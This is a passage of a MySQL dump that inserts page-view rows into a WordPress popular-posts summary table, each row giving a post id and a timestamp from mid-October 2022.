22:25:52'),(61979,3030,1,'2022-10-13','2022-10-13 22:41:02'),(61980,4840,1,'2022-10-13','2022-10-13 22:49:32'),(61981,4741,1,'2022-10-14','2022-10-14 00:40:52'),(61982,4238,1,'2022-10-14','2022-10-14 03:53:24'),(61983,4238,1,'2022-10-14','2022-10-14 04:41:07'),(61984,1602,1,'2022-10-14','2022-10-14 05:03:34'),(61985,1602,1,'2022-10-14','2022-10-14 05:03:40'),(61986,1544,1,'2022-10-14','2022-10-14 06:00:36'),(61987,483,1,'2022-10-14','2022-10-14 06:34:08'),(61988,1596,1,'2022-10-14','2022-10-14 07:03:02'),(61989,72,1,'2022-10-14','2022-10-14 07:26:27'),(61990,4436,1,'2022-10-14','2022-10-14 08:23:01'),(61991,3083,1,'2022-10-14','2022-10-14 08:55:29'),(61992,5062,1,'2022-10-14','2022-10-14 09:04:02'),(61993,5058,1,'2022-10-14','2022-10-14 09:11:08'),(61994,4457,1,'2022-10-14','2022-10-14 09:26:51'),(61995,1718,1,'2022-10-14','2022-10-14 10:15:55'),(61996,1718,1,'2022-10-14','2022-10-14 10:16:26'),(61997,1610,1,'2022-10-14','2022-10-14 11:10:11'),(61998,1582,1,'2022-10-14','2022-10-14 12:08:07'),(61999,1778,1,'2022-10-14','2022-10-14 12:10:35'),(62000,1778,1,'2022-10-14','2022-10-14 12:10:45'),(62001,1778,1,'2022-10-14','2022-10-14 12:11:01'),(62002,1582,1,'2022-10-14','2022-10-14 12:12:09'),(62003,1596,1,'2022-10-14','2022-10-14 12:52:36'),(62004,1602,1,'2022-10-14','2022-10-14 12:57:05'),(62005,1602,1,'2022-10-14','2022-10-14 12:57:12'),(62006,91,1,'2022-10-14','2022-10-14 13:13:07'),(62007,5140,1,'2022-10-14','2022-10-14 13:14:22'),(62008,1598,1,'2022-10-14','2022-10-14 13:21:47'),(62009,68,1,'2022-10-14','2022-10-14 14:07:50'),(62010,68,1,'2022-10-14','2022-10-14 14:08:57'),(62011,91,1,'2022-10-14','2022-10-14 14:09:18'),(62012,5134,1,'2022-10-14','2022-10-14 14:09:35'),(62013,3041,1,'2022-10-14','2022-10-14 14:36:56'),(62014,4412,1,'2022-10-14','2022-10-14 14:45:17'),(62015,4966,1,'2022-10-14','2022-10-14 15:12:07'),(62016,469,1,'2022-10-14','2022-10-14 15:32:12'),(62017,2609,1,'2022-10-14','2022-10-14 15:32:51'),(62018,2609,1,'2022-10-14','2022-10-14 15:33:22'),(62019,84,1,'2022-10-14','2022-10-14 15:57:07'),(62020,570,1,'2022-10-14','2022-10-14 16:24:21'),(62021,72,1,'2022-10-14','2022-10-14 16:50:15'),(62022,1582,1,'2022-10-14','2022-10-14 16:55:45'),(62023,91,1,'2022-10-14','2022-10-14 16:56:38'),(62024,84,1,'2022-10-14','2022-10-14 16:57:13'),(62025,87,1,'2022-10-14','2022-10-14 16:57:25'),(62026,91,1,'2022-10-14','2022-10-14 16:57:41'),(62027,4556,1,'2022-10-14','2022-10-14 16:59:46'),(62028,91,1,'2022-10-14','2022-10-14 16:59:49'),(62029,1718,1,'2022-10-14','2022-10-14 17:06:09'),(62030,1718,1,'2022-10-14','2022-10-14 17:06:23'),(62031,1718,1,'2022-10-14','2022-10-14 17:06:45'),(62032,91,1,'2022-10-14','2022-10-14 17:07:01'),(62033,1720,1,'2022-10-14','2022-10-14 17:08:00'),(62034,1720,1,'2022-10-14','2022-10-14 17:08:17'),(62035,2395,1,'2022-10-14','2022-10-14 17:11:03'),(62036,76,1,'2022-10-14','2022-10-14 17:16:40'),(62037,68,1,'2022-10-14','2022-10-14 17:16:48'),(62038,108,1,'2022-10-14','2022-10-14 17:17:47'),(62039,72,1,'2022-10-14','2022-10-14 17:18:07'),(62040,68,1,'2022-10-14','2022-10-14 17:18:37'),(62041,72,1,'2022-10-14','2022-10-14 17:18:44'),(62042,68,1,'2022-10-14','2022-10-14 17:19:12'),(62043,84,1,'2022-10-14','2022-10-14 17:19:55'),(62044,87,1,'2022-10-14','2022-10-14 17:20:10'),(62045,482,1,'2022-10-14','2022-10-14 17:20:23'),(62046,481,1,'2022-10-14','2022-10-14 17:20:39'),(62047,482,1,'2022-10-14','2022-10-14 17:20:51'),(62048,483,1,'2022-10-14','2022-10-14 17:20:55'),(62049,484,1,'2022-10-14','2022-10-14 17:21:37'),(62050,485,1,'2022-10-14','2022-10-14 17:21:52'),(62051,486,1,'2022-10-14','2022-10-14 17:22:04'),(62052,487,1,'2022-10-14','2022-10-14 17:22:10'),(62053,488,1,'2022-10-14','2022-10-14 17:22:16'),(62054,68,1,'2022-10-14','2022-10-14 17:26:40'),(62055,1544,1,'2022-10-14','2022-10-14 17:40:59'),(62056,68,1,'2022-10-14','2022-10-14 18:02:49'),(62057,474,1,'2022-10-14','2022-10-14 18:04:14'),(62058,2309,1,'2022-10-14','2022-10-14 19:15:07'),(62059,1588,1,'2022-10-14','2022-10-14 19:59:19'),(62060,68,1,'2022-10-14','2022-10-14 20:19:27'),(62061,68,1,'2022-10-14','2022-10-14 20:44:23'),(62062,4963,1,'2022-10-14','2022-10-14 20:44:30'),(62063,2410,1,'2022-10-14','2022-10-14 21:10:51'),(62064,2904,1,'2022-10-14','2022-10-14 23:15:47'),(62065,1544,1,'2022-10-14','2022-10-14 23:39:33'),(62066,1544,1,'2022-10-14','2022-10-14 23:42:41'),(62067,3287,1,'2022-10-15','2022-10-15 00:02:34'),(62068,4416,1,'2022-10-15','2022-10-15 00:38:57'),(62069,2775,1,'2022-10-15','2022-10-15 00:42:59'),(62070,68,1,'2022-10-15','2022-10-15 01:15:57'),(62071,4747,1,'2022-10-15','2022-10-15 01:17:56'),(62072,1707,1,'2022-10-15','2022-10-15 01:59:48'),(62073,3063,1,'2022-10-15','2022-10-15 02:41:48'),(62074,3124,1,'2022-10-15','2022-10-15 03:17:07'),(62075,72,1,'2022-10-15','2022-10-15 03:29:07'),(62076,5080,1,'2022-10-15','2022-10-15 03:56:58'),(62077,1582,1,'2022-10-15','2022-10-15 05:10:40'),(62078,1544,1,'2022-10-15','2022-10-15 07:51:46'),(62079,3102,1,'2022-10-15','2022-10-15 07:53:45'),(62080,3102,1,'2022-10-15','2022-10-15 08:24:58'),(62081,1544,1,'2022-10-15','2022-10-15 08:33:14'),(62082,1588,1,'2022-10-15','2022-10-15 08:45:52'),(62083,1720,1,'2022-10-15','2022-10-15 09:00:34'),(62084,1720,1,'2022-10-15','2022-10-15 09:17:32'),(62085,4717,1,'2022-10-15','2022-10-15 09:51:25'),(62086,3030,1,'2022-10-15','2022-10-15 09:58:15'),(62087,1544,1,'2022-10-15','2022-10-15 10:21:47'),(62088,2395,1,'2022-10-15','2022-10-15 10:25:40'),(62089,1544,1,'2022-10-15','2022-10-15 11:13:18'),(62090,3764,1,'2022-10-15','2022-10-15 11:23:08'),(62091,3764,1,'2022-10-15','2022-10-15 11:23:10'),(62092,4753,1,'2022-10-15','2022-10-15 12:52:56'),(62093,3102,1,'2022-10-15','2022-10-15 13:00:10'),(62094,1877,1,'2022-10-15','2022-10-15 13:29:32'),(62095,91,1,'2022-10-15','2022-10-15 13:54:02'),(62096,4608,1,'2022-10-15','2022-10-15 13:54:41'),(62097,91,1,'2022-10-15','2022-10-15 13:56:46'),(62098,5058,1,'2022-10-15','2022-10-15 14:20:28'),(62099,4753,1,'2022-10-15','2022-10-15 14:20:47'),(62100,5058,1,'2022-10-15','2022-10-15 14:21:58'),(62101,72,1,'2022-10-15','2022-10-15 14:36:47'),(62102,2989,1,'2022-10-15','2022-10-15 15:25:43'),(62103,1544,1,'2022-10-15','2022-10-15 15:26:10'),(62104,1606,1,'2022-10-15','2022-10-15 15:29:41'),(62105,1606,1,'2022-10-15','2022-10-15 15:31:39'),(62106,2989,1,'2022-10-15','2022-10-15 15:32:45'),(62107,108,1,'2022-10-15','2022-10-15 16:19:27'),(62108,2309,1,'2022-10-15','2022-10-15 17:07:14'),(62109,1586,1,'2022-10-15','2022-10-15 17:37:13'),(62110,4335,1,'2022-10-15','2022-10-15 17:52:12'),(62111,1610,1,'2022-10-15','2022-10-15 20:55:50'),(62112,1610,1,'2022-10-15','2022-10-15 20:56:02'),(62113,3710,1,'2022-10-15','2022-10-15 21:50:45'),(62114,1544,1,'2022-10-15','2022-10-15 22:23:09'),(62115,72,1,'2022-10-15','2022-10-15 22:36:09'),(62116,1610,1,'2022-10-15','2022-10-15 22:58:25'),(62117,2457,1,'2022-10-15','2022-10-15 23:07:20'),(62118,1610,1,'2022-10-15','2022-10-15 23:23:11'),(62119,4866,1,'2022-10-15','2022-10-15 23:26:49'),(62120,2704,1,'2022-10-15','2022-10-15 23:34:09'),(62121,4785,1,'2022-10-16','2022-10-16 00:56:47'),(62122,4457,1,'2022-10-16','2022-10-16 01:05:07'),(62123,87,1,'2022-10-16','2022-10-16 01:05:52'),(62124,4457,1,'2022-10-16','2022-10-16 01:06:27'),(62125,3180,1,'2022-10-16','2022-10-16 03:00:20'),(62126,1586,1,'2022-10-16','2022-10-16 03:35:41'),(62127,1594,1,'2022-10-16','2022-10-16 04:02:28'),(62128,4960,1,'2022-10-16','2022-10-16 04:08:35'),(62129,4741,1,'2022-10-16','2022-10-16 04:30:20'),(62130,4520,1,'2022-10-16','2022-10-16 04:36:04'),(62131,5146,1,'2022-10-16','2022-10-16 04:41:58'),(62132,4238,1,'2022-10-16','2022-10-16 04:52:53'),(62133,3752,1,'2022-10-16','2022-10-16 05:12:44'),(62134,5028,1,'2022-10-16','2022-10-16 05:18:41'),(62135,5028,1,'2022-10-16','2022-10-16 05:18:42'),(62136,5028,1,'2022-10-16','2022-10-16 05:18:46'),(62137,72,1,'2022-10-16','2022-10-16 06:00:52'),(62138,1544,1,'2022-10-16','2022-10-16 06:12:26'),(62139,2159,1,'2022-10-16','2022-10-16 07:14:46'),(62140,72,1,'2022-10-16','2022-10-16 07:51:41'),(62141,1544,1,'2022-10-16','2022-10-16 07:55:48'),(62142,80,1,'2022-10-16','2022-10-16 07:56:30'),(62143,1544,1,'2022-10-16','2022-10-16 07:56:44'),(62144,2704,1,'2022-10-16','2022-10-16 09:00:36'),(62145,4776,1,'2022-10-16','2022-10-16 09:42:34'),(62146,4762,1,'2022-10-16','2022-10-16 09:53:17'),(62147,5058,1,'2022-10-16','2022-10-16 09:57:08'),(62148,4762,1,'2022-10-16','2022-10-16 09:58:36'),(62149,2904,1,'2022-10-16','2022-10-16 12:24:10'),(62150,102,1,'2022-10-16','2022-10-16 12:25:29'),(62151,102,1,'2022-10-16','2022-10-16 12:27:53'),(62152,74,1,'2022-10-16','2022-10-16 12:29:47'),(62153,74,1,'2022-10-16','2022-10-16 12:29:57'),(62154,2904,1,'2022-10-16','2022-10-16 12:30:45'),(62155,2904,1,'2022-10-16','2022-10-16 12:32:46'),(62156,4238,1,'2022-10-16','2022-10-16 14:46:20'),(62157,4938,1,'2022-10-16','2022-10-16 15:22:57'),(62158,1612,1,'2022-10-16','2022-10-16 15:31:19'),(62159,72,1,'2022-10-16','2022-10-16 15:51:24'),(62160,3006,1,'2022-10-16','2022-10-16 16:10:37'),(62161,80,1,'2022-10-16','2022-10-16 16:42:29'),(62162,1586,1,'2022-10-16','2022-10-16 17:46:33'),(62163,1586,1,'2022-10-16','2022-10-16 17:46:43'),(62164,3534,1,'2022-10-16','2022-10-16 18:01:41'),(62165,2904,1,'2022-10-16','2022-10-16 18:06:32'),(62166,4341,1,'2022-10-16','2022-10-16 18:31:20'),(62167,1612,1,'2022-10-16','2022-10-16 18:49:26'),(62168,1588,1,'2022-10-16','2022-10-16 18:56:07'),(62169,5071,1,'2022-10-16','2022-10-16 19:20:14'),(62170,1544,1,'2022-10-16','2022-10-16 19:22:05'),(62171,3072,1,'2022-10-16','2022-10-16 19:53:26'),(62172,467,1,'2022-10-16','2022-10-16 20:15:56'),(62173,5071,1,'2022-10-16','2022-10-16 20:33:42'),(62174,1600,1,'2022-10-16','2022-10-16 20:58:06'),(62175,3117,1,'2022-10-16','2022-10-16 20:58:28'),(62176,4966,1,'2022-10-16','2022-10-16 22:12:46'),(62177,488,1,'2022-10-16','2022-10-16 23:01:56'),(62178,80,1,'2022-10-16','2022-10-16 23:34:08'),(62179,68,1,'2022-10-16','2022-10-16 23:34:14'),(62180,84,1,'2022-10-16','2022-10-16 23:34:26'),(62181,87,1,'2022-10-16','2022-10-16 23:34:36'),(62182,89,1,'2022-10-16','2022-10-16 23:34:38'),(62183,4930,1,'2022-10-16','2022-10-16 23:34:41'),(62184,91,1,'2022-10-16','2022-10-16 23:34:51'),(62185,76,1,'2022-10-16','2022-10-16 23:34:55'),(62186,72,1,'2022-10-16','2022-10-16 23:35:07'),(62187,335,1,'2022-10-16','2022-10-16 23:35:10'),(62188,108,1,'2022-10-16','2022-10-16 23:35:19'),(62189,2503,1,'2022-10-16','2022-10-16 23:35:29'),(62190,1870,1,'2022-10-16','2022-10-16 23:35:39'),(62191,1877,1,'2022-10-16','2022-10-16 23:35:49'),(62192,1872,1,'2022-10-16','2022-10-16 23:35:58'),(62193,5137,1,'2022-10-16','2022-10-16 23:36:08'),(62194,5134,1,'2022-10-16','2022-10-16 23:36:20'),(62195,5131,1,'2022-10-16','2022-10-16 23:36:30'),(62196,2503,1,'2022-10-16','2022-10-16 23:58:03'),(62197,2503,1,'2022-10-16','2022-10-16 23:58:04'),(62198,72,1,'2022-10-17','2022-10-17 01:08:25'),(62199,3752,1,'2022-10-17','2022-10-17 02:28:04'),(62200,1722,1,'2022-10-17','2022-10-17 02:40:17'),(62201,2704,1,'2022-10-17','2022-10-17 02:45:55'),(62202,3307,1,'2022-10-17','2022-10-17 02:50:35'),(62203,68,1,'2022-10-17','2022-10-17 03:13:12'),(62204,3735,1,'2022-10-17','2022-10-17 04:31:17'),(62205,3251,1,'2022-10-17','2022-10-17 04:36:08'),(62206,3251,1,'2022-10-17','2022-10-17 04:36:24'),(62207,3251,1,'2022-10-17','2022-10-17 04:36:31'),(62208,3251,1,'2022-10-17','2022-10-17 04:36:40'),(62209,3721,1,'2022-10-17','2022-10-17 04:39:51'),(62210,4963,1,'2022-10-17','2022-10-17 05:48:13'),(62211,4963,1,'2022-10-17','2022-10-17 05:50:40'),(62212,1600,1,'2022-10-17','2022-10-17 06:01:18'),(62213,4428,1,'2022-10-17','2022-10-17 06:28:58'),(62214,1582,1,'2022-10-17','2022-10-17 06:37:43'),(62215,2248,1,'2022-10-17','2022-10-17 06:50:15'),(62216,3313,1,'2022-10-17','2022-10-17 07:01:14'),(62217,68,1,'2022-10-17','2022-10-17 08:34:31'),(62218,72,1,'2022-10-17','2022-10-17 09:13:05');
INSERT INTO `wp_popularpostssummary` VALUES (62219,3030,1,'2022-10-17','2022-10-17 09:28:27'),(62220,80,1,'2022-10-17','2022-10-17 09:48:25'),(62221,1588,1,'2022-10-17','2022-10-17 09:52:43'),(62222,1588,1,'2022-10-17','2022-10-17 09:53:20'),(62223,80,1,'2022-10-17','2022-10-17 10:05:35'),(62224,3102,1,'2022-10-17','2022-10-17 10:14:40'),(62225,3102,1,'2022-10-17','2022-10-17 10:33:58'),(62226,1724,1,'2022-10-17','2022-10-17 11:02:43'),(62227,3104,1,'2022-10-17','2022-10-17 12:30:45'),(62228,1612,1,'2022-10-17','2022-10-17 12:32:40'),(62229,1596,1,'2022-10-17','2022-10-17 13:04:33'),(62230,570,1,'2022-10-17','2022-10-17 13:18:27'),(62231,1594,1,'2022-10-17','2022-10-17 13:56:16'),(62232,1612,1,'2022-10-17','2022-10-17 14:13:50'),(62233,1588,1,'2022-10-17','2022-10-17 14:20:53'),(62234,2410,1,'2022-10-17','2022-10-17 14:49:29'),(62235,89,1,'2022-10-17','2022-10-17 15:19:45'),(62236,3083,1,'2022-10-17','2022-10-17 15:40:24'),(62237,3083,1,'2022-10-17','2022-10-17 15:46:00'),(62238,76,1,'2022-10-17','2022-10-17 15:46:15'),(62239,2904,1,'2022-10-17','2022-10-17 15:48:33'),(62240,2904,1,'2022-10-17','2022-10-17 15:48:35'),(62241,2904,1,'2022-10-17','2022-10-17 15:49:13'),(62242,2904,1,'2022-10-17','2022-10-17 15:49:23'),(62243,2904,1,'2022-10-17','2022-10-17 15:49:28'),(62244,2904,1,'2022-10-17','2022-10-17 15:49:53'),(62245,3083,1,'2022-10-17','2022-10-17 15:52:02'),(62246,5137,1,'2022-10-17','2022-10-17 15:53:51'),(62247,2410,1,'2022-10-17','2022-10-17 16:28:18'),(62248,2410,1,'2022-10-17','2022-10-17 16:30:51'),(62249,1588,1,'2022-10-17','2022-10-17 16:59:39'),(62250,3072,1,'2022-10-17','2022-10-17 17:55:28'),(62251,3107,1,'2022-10-17','2022-10-17 17:56:47'),(62252,1600,1,'2022-10-17','2022-10-17 18:06:36'),(62253,1745,1,'2022-10-17','2022-10-17 18:10:26'),(62254,72,1,'2022-10-17','2022-10-17 18:12:41'),(62255,4950,1,'2022-10-17','2022-10-17 18:23:30'),(62256,3534,1,'2022-10-17','2022-10-17 18:32:30'),(62257,80,1,'2022-10-17','2022-10-17 18:45:15'),(62258,5125,1,'2022-10-17','2022-10-17 18:48:58'),(62259,3752,1,'2022-10-17','2022-10-17 19:14:01'),(62260,5125,1,'2022-10-17','2022-10-17 19:22:27'),(62261,1608,1,'2022-10-17','2022-10-17 19:25:28'),(62262,1582,1,'2022-10-17','2022-10-17 19:39:20'),(62263,1612,1,'2022-10-17','2022-10-17 19:57:55'),(62264,3117,1,'2022-10-17','2022-10-17 20:08:04'),(62265,1582,1,'2022-10-17','2022-10-17 20:18:13'),(62266,4966,1,'2022-10-17','2022-10-17 20:19:54'),(62267,5131,1,'2022-10-17','2022-10-17 20:48:41'),(62268,1612,1,'2022-10-17','2022-10-17 21:18:39'),(62269,5131,1,'2022-10-17','2022-10-17 21:48:43'),(62270,4674,1,'2022-10-17','2022-10-17 22:18:50'),(62271,5119,1,'2022-10-17','2022-10-17 22:48:38'),(62272,1594,1,'2022-10-17','2022-10-17 22:53:01'),(62273,3066,1,'2022-10-17','2022-10-17 23:08:22'),(62274,1594,1,'2022-10-17','2022-10-17 23:15:52'),(62275,5062,1,'2022-10-17','2022-10-17 23:18:27'),(62276,1612,1,'2022-10-18','2022-10-18 00:18:38'),(62277,4517,1,'2022-10-18','2022-10-18 01:25:12'),(62278,1745,1,'2022-10-18','2022-10-18 01:55:09'),(62279,72,1,'2022-10-18','2022-10-18 03:24:24'),(62280,1600,1,'2022-10-18','2022-10-18 03:33:08'),(62281,3752,1,'2022-10-18','2022-10-18 03:51:20'),(62282,5125,1,'2022-10-18','2022-10-18 04:32:16'),(62283,1594,1,'2022-10-18','2022-10-18 04:39:12'),(62284,1608,1,'2022-10-18','2022-10-18 04:55:07'),(62285,3180,1,'2022-10-18','2022-10-18 05:21:05'),(62286,4785,1,'2022-10-18','2022-10-18 05:25:04'),(62287,1544,1,'2022-10-18','2022-10-18 05:58:37'),(62288,1610,1,'2022-10-18','2022-10-18 05:58:44'),(62289,91,1,'2022-10-18','2022-10-18 05:58:46'),(62290,3107,1,'2022-10-18','2022-10-18 05:58:48'),(62291,1751,1,'2022-10-18','2022-10-18 06:06:13'),(62292,4335,1,'2022-10-18','2022-10-18 06:13:35'),(62293,472,1,'2022-10-18','2022-10-18 06:24:41'),(62294,4741,1,'2022-10-18','2022-10-18 06:28:37'),(62295,484,1,'2022-10-18','2022-10-18 06:42:03'),(62296,5163,1,'2022-10-18','2022-10-18 06:44:57'),(62297,2178,1,'2022-10-18','2022-10-18 06:50:16'),(62298,1606,1,'2022-10-18','2022-10-18 06:52:03'),(62299,1606,1,'2022-10-18','2022-10-18 06:52:05'),(62300,480,1,'2022-10-18','2022-10-18 07:02:27'),(62301,4996,1,'2022-10-18','2022-10-18 07:10:10'),(62302,4391,1,'2022-10-18','2022-10-18 07:12:01'),(62303,1596,1,'2022-10-18','2022-10-18 07:28:39'),(62304,5137,1,'2022-10-18','2022-10-18 07:28:43'),(62305,72,1,'2022-10-18','2022-10-18 07:30:01'),(62306,4412,1,'2022-10-18','2022-10-18 07:32:55'),(62307,4416,1,'2022-10-18','2022-10-18 07:33:55'),(62308,84,1,'2022-10-18','2022-10-18 07:42:03'),(62309,1782,1,'2022-10-18','2022-10-18 07:55:06'),(62310,4938,1,'2022-10-18','2022-10-18 08:07:12'),(62311,5131,1,'2022-10-18','2022-10-18 08:17:58'),(62312,4976,1,'2022-10-18','2022-10-18 08:19:31'),(62313,4938,1,'2022-10-18','2022-10-18 08:29:38'),(62314,5163,1,'2022-10-18','2022-10-18 08:34:01'),(62315,68,1,'2022-10-18','2022-10-18 08:34:10'),(62316,5163,1,'2022-10-18','2022-10-18 08:34:34'),(62317,68,1,'2022-10-18','2022-10-18 08:40:03'),(62318,76,1,'2022-10-18','2022-10-18 08:40:21'),(62319,68,1,'2022-10-18','2022-10-18 08:41:37'),(62320,68,1,'2022-10-18','2022-10-18 08:45:36'),(62321,1544,1,'2022-10-18','2022-10-18 08:48:04'),(62322,76,1,'2022-10-18','2022-10-18 08:51:29'),(62323,4785,1,'2022-10-18','2022-10-18 08:52:29'),(62324,76,1,'2022-10-18','2022-10-18 08:53:47'),(62325,1544,1,'2022-10-18','2022-10-18 08:53:52'),(62326,1544,1,'2022-10-18','2022-10-18 08:56:18'),(62327,4529,1,'2022-10-18','2022-10-18 09:03:49'),(62328,2904,1,'2022-10-18','2022-10-18 09:09:50'),(62329,2904,1,'2022-10-18','2022-10-18 09:13:14'),(62330,1544,1,'2022-10-18','2022-10-18 09:13:25'),(62331,1695,1,'2022-10-18','2022-10-18 09:19:09'),(62332,1606,1,'2022-10-18','2022-10-18 09:28:16'),(62333,1584,1,'2022-10-18','2022-10-18 09:28:19'),(62334,5163,1,'2022-10-18','2022-10-18 09:30:03'),(62335,1612,1,'2022-10-18','2022-10-18 09:34:35'),(62336,473,1,'2022-10-18','2022-10-18 09:42:57'),(62337,470,1,'2022-10-18','2022-10-18 09:43:04'),(62338,473,1,'2022-10-18','2022-10-18 09:43:07'),(62339,468,1,'2022-10-18','2022-10-18 09:43:14'),(62340,468,1,'2022-10-18','2022-10-18 09:43:39'),(62341,487,1,'2022-10-18','2022-10-18 09:43:45'),(62342,474,1,'2022-10-18','2022-10-18 09:44:06'),(62343,474,1,'2022-10-18','2022-10-18 09:44:43'),(62344,470,1,'2022-10-18','2022-10-18 09:44:50'),(62345,91,1,'2022-10-18','2022-10-18 09:51:44'),(62346,3030,1,'2022-10-18','2022-10-18 10:24:09'),(62347,570,1,'2022-10-18','2022-10-18 10:35:17'),(62348,91,1,'2022-10-18','2022-10-18 10:43:37'),(62349,4897,1,'2022-10-18','2022-10-18 10:44:36'),(62350,91,1,'2022-10-18','2022-10-18 10:45:33'),(62351,5054,1,'2022-10-18','2022-10-18 10:46:29'),(62352,1602,1,'2022-10-18','2022-10-18 10:59:38'),(62353,5054,1,'2022-10-18','2022-10-18 11:01:45'),(62354,5054,1,'2022-10-18','2022-10-18 11:03:04'),(62355,72,1,'2022-10-18','2022-10-18 11:28:17'),(62356,2410,1,'2022-10-18','2022-10-18 11:45:55'),(62357,2410,1,'2022-10-18','2022-10-18 11:46:04'),(62358,468,1,'2022-10-18','2022-10-18 11:57:08'),(62359,5054,1,'2022-10-18','2022-10-18 12:11:02'),(62360,1544,1,'2022-10-18','2022-10-18 12:40:43'),(62361,1544,1,'2022-10-18','2022-10-18 12:40:43'),(62362,4966,1,'2022-10-18','2022-10-18 13:02:48'),(62363,1600,1,'2022-10-18','2022-10-18 13:48:51'),(62364,4996,1,'2022-10-18','2022-10-18 14:05:34'),(62365,4454,1,'2022-10-18','2022-10-18 14:05:38'),(62366,1608,1,'2022-10-18','2022-10-18 14:14:50'),(62367,1600,1,'2022-10-18','2022-10-18 14:15:57'),(62368,4454,1,'2022-10-18','2022-10-18 14:27:49'),(62369,3691,1,'2022-10-18','2022-10-18 15:09:22'),(62370,1612,1,'2022-10-18','2022-10-18 15:29:06'),(62371,4420,1,'2022-10-18','2022-10-18 15:33:15'),(62372,3066,1,'2022-10-18','2022-10-18 15:35:11'),(62373,482,1,'2022-10-18','2022-10-18 15:35:20'),(62374,1544,1,'2022-10-18','2022-10-18 15:48:04'),(62375,1598,1,'2022-10-18','2022-10-18 15:51:46'),(62376,1600,1,'2022-10-18','2022-10-18 15:59:22'),(62377,87,1,'2022-10-18','2022-10-18 16:07:20'),(62378,91,1,'2022-10-18','2022-10-18 16:28:04'),(62379,87,1,'2022-10-18','2022-10-18 16:29:57'),(62380,1544,1,'2022-10-18','2022-10-18 16:31:29'),(62381,4938,1,'2022-10-18','2022-10-18 16:32:02'),(62382,482,1,'2022-10-18','2022-10-18 17:05:14'),(62383,467,1,'2022-10-18','2022-10-18 17:16:25'),(62384,4938,1,'2022-10-18','2022-10-18 17:16:29'),(62385,2395,1,'2022-10-18','2022-10-18 17:19:02'),(62386,3034,1,'2022-10-18','2022-10-18 17:20:08'),(62387,84,1,'2022-10-18','2022-10-18 17:22:41'),(62388,1614,1,'2022-10-18','2022-10-18 17:27:32'),(62389,4709,1,'2022-10-18','2022-10-18 17:48:21'),(62390,4785,1,'2022-10-18','2022-10-18 18:01:26'),(62391,2159,1,'2022-10-18','2022-10-18 18:08:30'),(62392,72,1,'2022-10-18','2022-10-18 18:08:37'),(62393,1606,1,'2022-10-18','2022-10-18 18:08:42'),(62394,1606,1,'2022-10-18','2022-10-18 18:08:48'),(62395,470,1,'2022-10-18','2022-10-18 18:15:50'),(62396,3781,1,'2022-10-18','2022-10-18 18:30:52'),(62397,3771,1,'2022-10-18','2022-10-18 18:38:20'),(62398,3175,1,'2022-10-18','2022-10-18 18:53:31'),(62399,472,1,'2022-10-18','2022-10-18 18:53:40'),(62400,1544,1,'2022-10-18','2022-10-18 19:00:52'),(62401,472,1,'2022-10-18','2022-10-18 19:23:19'),(62402,4622,1,'2022-10-18','2022-10-18 19:30:52'),(62403,471,1,'2022-10-18','2022-10-18 19:38:29'),(62404,68,1,'2022-10-18','2022-10-18 19:47:18'),(62405,1774,1,'2022-10-18','2022-10-18 20:21:35'),(62406,72,1,'2022-10-18','2022-10-18 20:29:28'),(62407,5163,1,'2022-10-18','2022-10-18 20:34:26'),(62408,1751,1,'2022-10-18','2022-10-18 20:43:26'),(62409,2964,1,'2022-10-18','2022-10-18 21:13:26'),(62410,5071,1,'2022-10-18','2022-10-18 21:28:43'),(62411,5134,1,'2022-10-18','2022-10-18 21:44:31'),(62412,3735,1,'2022-10-18','2022-10-18 21:54:53'),(62413,3030,1,'2022-10-18','2022-10-18 21:54:57'),(62414,1774,1,'2022-10-18','2022-10-18 22:19:22'),(62415,4694,1,'2022-10-18','2022-10-18 22:43:49'),(62416,4517,1,'2022-10-18','2022-10-18 23:08:21'),(62417,1608,1,'2022-10-19','2022-10-19 00:04:12'),(62418,1608,1,'2022-10-19','2022-10-19 00:49:10'),(62419,1604,1,'2022-10-19','2022-10-19 00:59:49'),(62420,1594,1,'2022-10-19','2022-10-19 01:24:42'),(62421,1594,1,'2022-10-19','2022-10-19 01:27:43'),(62422,1870,1,'2022-10-19','2022-10-19 01:28:10'),(62423,84,1,'2022-10-19','2022-10-19 01:32:52'),(62424,2704,1,'2022-10-19','2022-10-19 01:33:58'),(62425,5042,1,'2022-10-19','2022-10-19 01:34:11'),(62426,1877,1,'2022-10-19','2022-10-19 01:49:28'),(62427,1872,1,'2022-10-19','2022-10-19 01:49:36'),(62428,1544,1,'2022-10-19','2022-10-19 01:59:00'),(62429,1544,1,'2022-10-19','2022-10-19 02:09:34'),(62430,4996,1,'2022-10-19','2022-10-19 02:09:44'),(62431,4454,1,'2022-10-19','2022-10-19 02:09:52'),(62432,1606,1,'2022-10-19','2022-10-19 03:00:35'),(62433,1606,1,'2022-10-19','2022-10-19 03:00:39'),(62434,72,1,'2022-10-19','2022-10-19 03:00:41'),(62435,2159,1,'2022-10-19','2022-10-19 03:00:42'),(62436,2159,1,'2022-10-19','2022-10-19 03:01:03'),(62437,1709,1,'2022-10-19','2022-10-19 03:01:13'),(62438,4323,1,'2022-10-19','2022-10-19 03:06:25'),(62439,4703,1,'2022-10-19','2022-10-19 03:06:48'),(62440,4677,1,'2022-10-19','2022-10-19 03:16:00'),(62441,4703,1,'2022-10-19','2022-10-19 03:22:26'),(62442,4703,1,'2022-10-19','2022-10-19 03:23:23'),(62443,4566,1,'2022-10-19','2022-10-19 03:31:01'),(62444,4996,1,'2022-10-19','2022-10-19 03:39:27'),(62445,4454,1,'2022-10-19','2022-10-19 03:39:41'),(62446,4694,1,'2022-10-19','2022-10-19 03:48:15'),(62447,472,1,'2022-10-19','2022-10-19 03:49:26'),(62448,3030,1,'2022-10-19','2022-10-19 04:07:44'),(62449,72,1,'2022-10-19','2022-10-19 04:30:33'),(62450,4827,1,'2022-10-19','2022-10-19 04:31:04'),(62451,2904,1,'2022-10-19','2022-10-19 04:32:54'),(62452,4785,1,'2022-10-19','2022-10-19 04:56:09'),(62453,470,1,'2022-10-19','2022-10-19 05:03:20'),(62454,72,1,'2022-10-19','2022-10-19 05:14:45'),(62455,72,1,'2022-10-19','2022-10-19 05:16:10'),(62456,72,1,'2022-10-19','2022-10-19 05:16:37'),(62457,5109,1,'2022-10-19','2022-10-19 05:16:47'),(62458,72,1,'2022-10-19','2022-10-19 05:28:46'),(62459,2150,1,'2022-10-19','2022-10-19 05:50:11'),(62460,3735,1,'2022-10-19','2022-10-19 05:50:53'),(62461,4556,1,'2022-10-19','2022-10-19 06:27:13'),(62462,4750,1,'2022-10-19','2022-10-19 06:40:20'),(62463,1614,1,'2022-10-19','2022-10-19 06:44:31'),(62464,4694,1,'2022-10-19','2022-10-19 07:13:24'),(62465,1612,1,'2022-10-19','2022-10-19 